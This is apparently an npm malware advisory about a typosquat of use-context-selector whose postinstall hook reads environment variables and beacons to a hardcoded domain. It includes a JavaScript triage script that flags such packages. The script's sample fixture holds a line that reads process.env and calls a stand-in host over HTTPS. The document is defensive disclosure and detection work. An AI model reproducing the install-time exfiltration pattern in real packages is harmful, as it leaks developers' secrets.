MAL-2026-4698

Malicious code in use-context-selector-tony (npm)

Details

--- _-= Per source details. Do not edit below this line.=-_

## Source: amazon-inspector (6dde262b1fecc08fe5853c4ec7ada6c3c3746a6e7afb5bd18c33d5adfa03843c)

This package is a name-squat of the popular `use-context-selector` library and ships a postinstall script (`dist/postinstall.js` / `src/postinstall.js`) that, on `npm install`, reads `process.env` and beacons to the hardcoded endpoint `https://almondco.online` via `https.get`. The endpoint is unrelated to any published `use-context-selector` author or infrastructure and is hardcoded in the install-lifecycle script. The combination of (a) name confusion against an established library, (b) a `postinstall` hook firing without consent on every `npm install`, (c) reads of `process.env`, and (d) outbound HTTPS to an attacker-controlled domain matches the standard install-time environment-exfiltration pattern.
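The four signals (a) to (d) can be checked statically on an unpacked tarball before anything is installed. The following is an added example, not code from this advisory or from the package; `KNOWN_NAMES`, the sample manifest's `postinstall` command and the `collector.example` host are constructed assumptions.

```javascript
// Added example, not code from the advisory. KNOWN_NAMES is an assumed list of
// libraries you really depend on; the sample input at the bottom is constructed.
const KNOWN_NAMES = ["use-context-selector"];
const INSTALL_HOOKS = ["preinstall", "install", "postinstall"];

// (a) Name confusion: a known library name with an extra prefix or suffix.
function squattedName(name) {
  const bare = name.replace(/^@[^/]+\//, ""); // drop an npm scope if present
  const hit = KNOWN_NAMES.find(
    (k) => bare !== k && (bare.startsWith(k + "-") || bare.endsWith("-" + k))
  );
  return hit || null;
}

// (b) Install-lifecycle hooks in package.json and the JS files they invoke.
function installHooks(manifest) {
  const scripts = manifest.scripts || {};
  return INSTALL_HOOKS.filter((h) => scripts[h]).map((hook) => ({
    hook,
    files: [...scripts[hook].matchAll(/[\w./-]+\.[cm]?js\b/g)].map((m) =>
      m[0].replace(/^\.\//, "")
    ),
  }));
}

// (c) process.env reads and (d) hardcoded URL hosts in one script's source.
function scanSource(src) {
  const hosts = [...src.matchAll(/https?:\/\/([a-z0-9.-]+)/gi)].map((m) => m[1].toLowerCase());
  return { readsEnv: /\bprocess\s*\.\s*env\b/.test(src), hosts: [...new Set(hosts)] };
}

// Combine the four signals; `sources` maps file path -> file contents.
function triage(manifest, sources) {
  const out = { squats: squattedName(manifest.name), hooks: [], readsEnv: false, hosts: [] };
  for (const { hook, files } of installHooks(manifest)) {
    out.hooks.push(hook);
    for (const f of files) {
      const r = scanSource(sources[f] || "");
      out.readsEnv = out.readsEnv || r.readsEnv;
      out.hosts.push(...r.hosts);
    }
  }
  out.suspicious = Boolean(out.squats && out.hooks.length && out.readsEnv && out.hosts.length);
  return out;
}

// Constructed sample input (not the real package contents).
const sampleManifest = { name: "use-context-selector-tony", scripts: { postinstall: "node dist/postinstall.js" } };
const sampleSources = { "dist/postinstall.js": "const env = process.env;\nrequire('https').get('https://collector.example/');" };
console.log(triage(sampleManifest, sampleSources));
```

Installing with `npm install --ignore-scripts` keeps lifecycle hooks from running at all, which leaves time to run a check like this on the unpacked files.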

Affected packages

npm / use-context-selector-tony

No fixed version published yet for use-context-selector-tony (npm). Pin to a known-safe version or switch to an alternative.

References